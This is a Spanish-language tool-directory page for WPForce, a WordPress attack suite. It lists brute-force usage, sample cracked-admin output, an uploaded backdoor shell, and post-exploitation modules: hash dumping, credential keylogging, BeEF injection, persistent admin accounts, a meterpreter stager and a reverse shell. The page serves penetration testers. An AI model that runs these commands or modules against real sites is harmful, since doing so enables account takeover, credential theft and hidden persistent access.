Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
WPForce — Suite de Ataques a Wordpress | Kitploit
Herramientas/GitHubGitHub/n00py/wpforce
Ataques de ContraseñasGeneración de PayloadsExplotación de Aplicaciones WebPost-ExplotaciónPruebas de Penetración
GitHubn00py/wpforce

WPForce

Suite de Ataques a Wordpress

Ver Repositorio
9792235hace 5 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

Versiones de Python compatibles

WPForce - Suite de Ataque a WordPress

ACERCA DE:

WPForce es un conjunto de herramientas de ataque a WordPress. Actualmente contiene 2 scripts: WPForce, que fuerza bruta inicios de sesión a través de la API, y Yertle, que sube shells una vez que se han encontrado credenciales de administrador. Yertle también contiene varios módulos de post-explotación.

Para más información, visita el artículo del blog aquí: https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/

Blogs en otros idiomas:

Chino - www.mottoin.com/100381.html

Portugués - http://www.100security.com.br/wpforce/

Español - http://www.1024megas.com/2017/05/wpforce-fuerzabruta-postexplotacion.html

https://esgeeks.com/como-hackear-sitio-wordpress-con-wpforce/

Ruso - https://hackware.ru/?p=2547

Francés - https://securityhack3r.info/wpforce-brute-force-attack-tool-wordpress/

Turco - http://turkhackteam.org/web-server-guvenligi/1655005-wordpress-site-sizma-testi-part-1-a.html

CARACTERÍSTICAS:

  • Fuerza bruta a través de la API, sin pasar por el formulario de inicio de sesión, evitando algunas formas de protección
  • Puede subir automáticamente un shell interactivo
  • Se puede usar para generar un shell inverso completo
  • Extrae hashes de contraseñas de WordPress
  • Puede modificar la función de autenticación para recopilar contraseñas en texto plano
  • Inyecta el hook de BeEF en todas las páginas
  • Pivotear a meterpreter si es necesario

INSTALACIÓN:

root@kitploit:~
Yertle requiere la librería requests para ejecutarse.
http://docs.python-requests.org/en/master/user/install/

USO:

root@kitploit:~
python wpforce.py -i usr.txt -w pass.txt -u "http://www.[sitio].com"

   ,-~~-.___.       __        __ ____   _____
  / |  x     \      \ \      / /|  _ \ |  ___|___   _ __  ___  ___
 (  )        0       \ \ /\ / / | |_) || |_  / _ \ | '__|/ __|/ _ \.
  \_/-, ,----'  ____  \ V  V /  |  __/ |  _|| (_) || |  | (__|  __/
     ====      ||   \_ \_/\_/   |_|    |_|   \___/ |_|   \___|\___|
    /  \-'~;   ||     |
   /  __/~| ...||__/|-"   Herramienta de Ataque de Fuerza Bruta para WordPress
 =(  _____||________|                 ~n00py~

Lista de Usuarios: usr.txt (3)
Lista de Contraseñas: pass.txt (21)
URL: http://www[sitio].com
--------------------------
[[email protected] : xxxxxxxxxxxxx] ¡son credenciales válidas! - ESTA CUENTA ES ADMIN
--------------------------
--------------------------
[[email protected] : xxxxxxxxxxxx] ¡son credenciales válidas!
--------------------------
 100% Completo
Todos los pares correctos:
{'[email protected]': 'xxxxxxxxxxxxx', '[email protected]': 'xxxxxxxxxxxxx'}

 -h, --help            muestra este mensaje de ayuda y sale
  -i INPUT, --input INPUT
                        Nombre del archivo de entrada
  -w WORDLIST, --wordlist WORDLIST
                        Nombre del archivo de lista de palabras
  -u URL, --url URL     URL del objetivo
  -v, --verbose         Salida detallada. Muestra los intentos a medida que ocurren.
  -t THREADS, --threads THREADS
                        Determina el número de hilos a usar, por defecto es 10
  -a AGENT, --agent AGENT
                        Determina el user-agent
  -d, --debug           Esta opción se usa para determinar problemas con el script.


python yertle.py -u "[usuario]" -p "[contraseña]" -t "http://www.[sitio].com" -i
     _..---.--.    __   __        _   _
   .'\ __|/O.__)   \ \ / /__ _ __| |_| | ___
  /__.' _/ .-'_\    \ V / _ \ '__| __| |/ _ \.
 (____.'.-_\____)    | |  __/ |  | |_| |  __/
  (_/ _)__(_ \_)\_   |_|\___|_|   \__|_|\___|
   (_..)--(.._)'--'         ~n00py~
      Módulo de Post-explotación para WordPress

¡Backdoor subido!
Directorio de Subida: ebwhbas
os-shell>



  -h, --help            muestra este mensaje de ayuda y sale
  -i, --interactive     Shell de comandos interactiva
  -r, --reverse         Shell inverso
  -t TARGET, --target TARGET
                        URL del objetivo
  -u USERNAME, --username USERNAME
                        Nombre de usuario administrador
  -p PASSWORD, --password PASSWORD
                        Contraseña de administrador
  -li IP, --ip IP       IP del oyente
  -lp PORT, --port PORT
                        Puerto del oyente
  -v, --verbose         Salida detallada.
  -e EXISTING, --existing EXISTING
                        Omite subir un shell y se conecta al shell existente


Yertle actualmente contiene estos módulos:

root@kitploit:~
Comandos Principales
====================

Comando                   Descripción
-------                   -----------
?                         Menú de ayuda
beef                      Inyecta un hook de BeEF en el sitio web
dbcreds                   Muestra las credenciales de la base de datos
exit                      Termina la sesión
hashdump                  Extrae todos los hashes de contraseñas de WordPress
help                      Menú de ayuda
keylogger                 Parchea el núcleo de WordPress para registrar credenciales en texto plano
keylog                    Muestra el archivo de keylog
meterpreter               Ejecuta un stager de PHP meterpreter para conectarse a metasploit
persist                   Crea una cuenta de administrador que se volverá a agregar a sí misma
quit                      Termina la sesión
shell                     Envía un shell inverso TCP a un oyente netcat
stealth                   Oculta Yertle de la página de plugins
Descargar herramienta